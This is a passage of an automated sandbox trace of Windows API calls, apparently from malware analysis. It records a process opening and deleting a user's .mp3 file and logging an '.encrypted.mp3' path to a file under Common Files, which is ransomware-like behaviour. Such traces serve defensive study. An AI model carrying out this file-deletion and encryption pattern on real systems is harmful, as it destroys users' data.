hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.680] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.680] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.680] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.680] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.680] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.680] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.680] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0038.680] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.681] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xajmo5bmfrmn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0038.681] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.681] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.681] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0038.681] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0038.681] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0038.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0038.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.682] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0038.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.682] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0038.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x8898c8 [0038.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x8898c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0038.682] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.682] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0038.682] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0038.683] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0038.683] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0038.683] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0038.683] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0038.683] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.683] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897d8 [0038.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8897d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0038.684] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.684] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0038.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.684] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0038.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.684] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0038.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0038.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.684] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3", lpFilePart=0x0) returned 0x34 [0038.684] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5efa240, ftCreationTime.dwHighDateTime=0x1d5bf9d, ftLastAccessTime.dwLowDateTime=0x54f4ee0, ftLastAccessTime.dwHighDateTime=0x1d5be37, ftLastWriteTime.dwLowDateTime=0x16c45680, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x13874, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="XajMo5BmFRMN.mp3", cAlternateFileName="XAJMO5~1.MP3")) returned 0x7c2100 [0038.684] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xajmo5bmfrmn.mp3")) returned 1 [0038.685] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5efa240, ftCreationTime.dwHighDateTime=0x1d5bf9d, ftLastAccessTime.dwLowDateTime=0x54f4ee0, ftLastAccessTime.dwHighDateTime=0x1d5be37, ftLastWriteTime.dwLowDateTime=0x16c45680, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x13874, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="XajMo5BmFRMN.mp3", cAlternateFileName="XAJMO5~1.MP3")) returned 0 [0038.686] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.686] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.686] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0038.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0038.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0038.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.686] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.686] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0038.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.686] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.686] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.686] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.686] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.686] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.687] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0038.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0038.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.687] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0038.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.687] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.687] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.687] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.687] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0038.687] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.687] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.687] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0038.688] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2627, lpOverlapped=0x0) returned 1 [0038.688] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0038.688] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2627, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.688] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0038.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.encrypted.mp3\r\n", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0038.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x41) returned 0x88e138 [0038.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.encrypted.mp3\r\n", cchWideChar=65, lpMultiByteStr=0x88e138, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.encrypted.mp3\r\n", lpUsedDefaultChar=0x0) returned 65 [0038.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0038.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0038.688] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x40, lpOverlapped=0x0) returned 1 [0038.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0038.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.688] CloseHandle (hObject=0x140) returned 1 [0038.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0038.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.690] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0038.690] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 